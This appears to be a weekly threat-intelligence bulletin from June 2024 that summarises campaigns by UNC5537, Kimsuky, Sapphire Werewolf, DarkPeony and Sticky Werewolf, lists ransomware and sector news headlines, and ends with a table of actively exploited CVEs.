UNC5537 targets Snowflake customers via compromised credentials
Starting April 2024, Mandiant researchers analysed an ongoing threat campaign targeting Snowflake customer database instances. The researchers determined that the activity exclusively leverages compromised customer credentials that were previously exposed via multiple infostealer malware variants, including VIDAR, RISEPRO, REDLINE, RACOON STEALER, LUMMA, and METASTEALER. In several observed cases, the initial compromise of infostealer malware occurred on contractor systems that were used for personal activities, with 165 potentially exposed organisations identified to date. UNC5537 has been observed advertising the victim data for sale on cybercrime forums and attempting to extort many victims.
Kimsuky targets South Korean businesses with DurianBeacon and SmallTiger malware
Since November 2023, ASEC researchers observed an ongoing Kimsuky campaign targeting South Korean businesses, including defense contractors, automobile part manufacturers, and semiconductor manufacturers. While the campaign initially delivered Andariel’s backdoor, DurianBeacon, the final payload was replaced with SmallTiger in February 2024. The initial infection vector is currently unknown, though the threat actor was observed exploiting internal software update programs of victims during the lateral movement phase. The DurianBeacon attack cases involved the use of MultiRDP and Meterpreter, with DurianBeacon used to maintain control and steal information. The SmallTiger infections included the installation of Mimikatz and ProcDump for credential harvesting, with a change to GitHub for the C2 server observed in May 2024.
Sapphire Werewolf targets Russian industries with Amethyst stealer
Since March 2024, BI[.]ZONE researchers have observed an activity cluster, dubbed Sapphire Werewolf, that has conducted over 300 attacks using a SapphireStealer variant, dubbed Amethyst. Amethyst targets browser data, Telegram configuration files, PowerShell logs, and FileZilla and SSH configuration files. The activity cluster has targeted the Russian education, manufacturing, IT, defense, and aerospace engineering sectors. The researchers assess with medium confidence that phishing emails with T[.]LY links are used to deliver Amethyst. Various lures were identified being used alongside decoy documents, including an enforcement order, a Central Election Committee leaflet, and a decree from the President of Russia.
DarkPeony ControlPlug campaign abuses MMC files to deliver PlugX malware
NTT Security Holdings researchers identified a DarkPeony campaign, dubbed Operation ControlPlug, that abuses Microsoft Management Console (MMC) files to deliver PlugX malware. The attack specifically exploits the Control Taskpad feature to execute arbitrary commands, aiming to trick users into clicking links by manipulating the appearance settings within the MMC files. The campaign targets military and government organisations in Myanmar, the Philippines, Mongolia, and Serbia. The attack chain begins when the MMC file is opened, presenting a malicious link which triggers a PowerShell script once clicked.
Sticky Werewolf extends targeting to aviation sector
Morphisec researchers observed a new campaign by the threat actor, Sticky Werewolf, targeting the aviation industry with phishing emails purporting to come from the First Deputy General Director of the Moscow-based company, AO OKB Kristall. Rather than using malicious links within the emails, the latest campaign involves archive files containing LNK files that redirect to a payload stored on WebDAV servers. Among the observed payloads were Rhadamanthys Stealer and Ozone RAT. Based on targeting and geopolitical context, Sticky Werewolf is suspected to have links to a pro-Ukrainian cyberespionage group or hacktivists.
Ransomware
Volume of blog posts by operators during the last week.
Worldwide Web: An Analysis of Tactics and Techniques Attributed to Scattered SpiderGuidePoint Security – Jun 12 2024Special Health Resources’ “technical difficulties” are due to a ransomware attackDataBreaches.net – Jun 11 2024London hospitals face blood shortage after Synnovis ransomware attackBleepingComputer – Jun 10 2024FBI Distributes 7,000 LockBit Ransomware Decryption Keys to Help VictimsThe Hacker News – Jun 07 2024RansomHouse: Stolen Data Market, Influence Operations & Other Tricks Up the SleeveAnalyst1 – Jun 06 2024
Financial Services
Smishing Triad Is Targeting Pakistan To Defraud Banking Customers At ScaleResecurity – Jun 11 2024Data Breaches Are More Common and Costly in Financial Services, New Research FindsBizTech Magazine – Jun 10 2024UwU Lend hit by $20M crypto hackCointelegraph – Jun 10 2024DERO cryptojacking adopts new techniques to evade detection – wiz[.]ioWiz Blog – Jun 07 2024Commando Cat: A Novel Cryptojacking Attack Abusing Docker Remote API ServersTrend Micro – Jun 06 2024
Geopolitics
Noodle RAT: Reviewing the New Backdoor Used by Chinese-Speaking GroupsTrend Micro Research News Perspectives – Jun 11 2024Vietnamese Entities Targeted By China-Linked Mustang Panda In Cyber Espionage Cyble Blog – Jun 10 2024Russia is conducting an influence operation aimed at discrediting protests in GeorgiaOdessa Journal – Jun 08 2024Ukraine says hackers abuse SyncThing tool to steal dataBleepingComputer.com – Jun 06 2024Dutch political websites hit by cyber attacks as EU voting startsCloudFlare – Jun 06 2024Howling at the Inbox: Sticky Werewolf’s Latest Malicious Aviation AttacksMorphisec – Blog – Jun 06 2024
High Priority Vulnerabilities
| Name | Software | Base Score |
Temp Score |
|
|---|---|---|---|---|
| CVE-2024-4577 | PHP | 9.8 | 7.0 | |
| Related: TellYouThePass ransomware campaign actively exploits critical PHP vulnerability | ||||
| CVE-2024-4610 | Valhall GPU Kernel Driver | 7.8 | 7.8 | |
| Related: CVE-2024-4610 – Arm Mali GPU Zero-Day Under Active Exploit: Millions of Devices at Risk | ||||
| CVE-2022-42475 | FortiProxy SSL-VPN | 9.8 | 9.4 | |
| Related: Chinese cyber espionage campaign targets ‘dozens’ of Western governments, Dutch officials say | ||||
| CVE-2024-26169 | Windows | 7.8 | 6.8 | |
| Related: Ransomware Attackers May Have Used Privilege Escalation Vulnerability as Zero-day | ||||
| CVE-2017-0199 | Office | 7.8 | 6.0 | |
| Related: New Agent Tesla Campaign Targeting Spanish-Speaking People | ||||